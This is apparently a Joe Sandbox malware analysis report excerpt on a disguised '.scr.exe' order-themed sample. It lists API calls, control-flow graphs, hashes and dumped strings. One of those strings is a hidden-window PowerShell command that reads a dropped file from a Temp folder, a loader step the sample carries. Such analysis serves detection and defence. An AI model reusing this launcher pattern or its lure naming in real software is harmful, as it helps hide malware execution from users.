                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$wsprintf
                                                                                            • String ID: ... %d%%
                                                                                            • API String ID: 551687249-2449383134
                                                                                            • Opcode ID: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                            • Instruction ID: 25ee467b37f7358b1d8943912f63d539eb3ef7c07a249f5ee2dc3eaa61b9464a
                                                                                            • Opcode Fuzzy Hash: bb69fc25e18161a0849df33240b9b7daf63c30e93ac5b68caaa3da3af3354023
                                                                                            • Instruction Fuzzy Hash: 5B518E31900219EBCB11DF65DA44BAF3FA8AB40726F14417BF804BB2C1D7789E408BA9

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 717 4068a5-4068c5 GetSystemDirectoryW 718 4068c7 717->718 719 4068c9-4068cb 717->719 718->719 720 4068dc-4068de 719->720 721 4068cd-4068d6 719->721 723 4068df-406912 wsprintfW LoadLibraryExW 720->723 721->720 722 4068d8-4068da 721->722 722->723
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                            • wsprintfW.USER32 ref: 004068F7
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                            • API String ID: 2200240437-1106614640
                                                                                            • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction ID: d40490b37a95929041f6b14fe17981fa15644a851550e805e000283098582d10
                                                                                            • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                                                            • Instruction Fuzzy Hash: 41F0FC31511119AACF10BB64DD0DF9B375C9B00305F10847AE546F10D0EB789A68CBA8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 724 406040-40604c 725 40604d-406081 GetTickCount GetTempFileNameW 724->725 726 406090-406092 725->726 727 406083-406085 725->727 729 40608a-40608d 726->729 727->725 728 406087 727->728 728->729
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0040605E
                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-44229769
                                                                                            • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                            • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                            • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 817 4015c6-4015da call 402dab call 405e9b 822 401636-401639 817->822 823 4015dc-4015ef call 405e1d 817->823 825 401668-4022fb call 401423 822->825 826 40163b-40165a call 401423 call 406521 SetCurrentDirectoryW 822->826 832 4015f1-4015f4 823->832 833 401609-40160c call 405acf 823->833 840 402c2f-402c3e 825->840 826->840 843 401660-401663 826->843 832->833 834 4015f6-4015fd call 405aec 832->834 841 401611-401613 833->841 834->833 847 4015ff-401602 call 405a75 834->847 845 401615-40161a 841->845 846 40162c-401634 841->846 843->840 849 401629 845->849 850 40161c-401627 GetFileAttributesW 845->850 846->822 846->823 852 401607 847->852 849->846 850->846 850->849 852->841
                                                                                            APIs
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,C:\Users\user\AppData\Local\Temp\nsy3BF7.tmp,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"), ref: 00405EA9
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                              • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                              • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\nonopposable\ff4,?,00000000,000000F0), ref: 00401652
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nonopposable\ff4, xrefs: 00401645
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nonopposable\ff4
                                                                                            • API String ID: 1892508949-404807915
                                                                                            • Opcode ID: f55218e8b6f1fa2fa585d0983886a48e43472ac89c3349b89f97aee5203578da
                                                                                            • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                            • Opcode Fuzzy Hash: f55218e8b6f1fa2fa585d0983886a48e43472ac89c3349b89f97aee5203578da
                                                                                            • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                            • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                            • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                            • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                            • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                            • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                            • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                            • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                            • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                            • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                            • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                            • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                            • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                            • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                            • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                            • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                            • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                            • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                            • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                            • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                            • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                            • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                            APIs
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                            Strings
                                                                                            • powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp, xrefs: 00401BC7, 00401BCD, 00401BE7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2088046348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2088027514.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088067648.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088088396.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Company Profile and new order-202401127.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree
                                                                                            • String ID: powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarp
                                                                                            • API String ID: 3394109436-3685013750
                                                                                            • Opcode ID: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
                                                                                            • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                                                            • Opcode Fuzzy Hash: 447f2160a9f8a762491bb83b7e5e8947865ce659ff46afcc73d93e079212092c
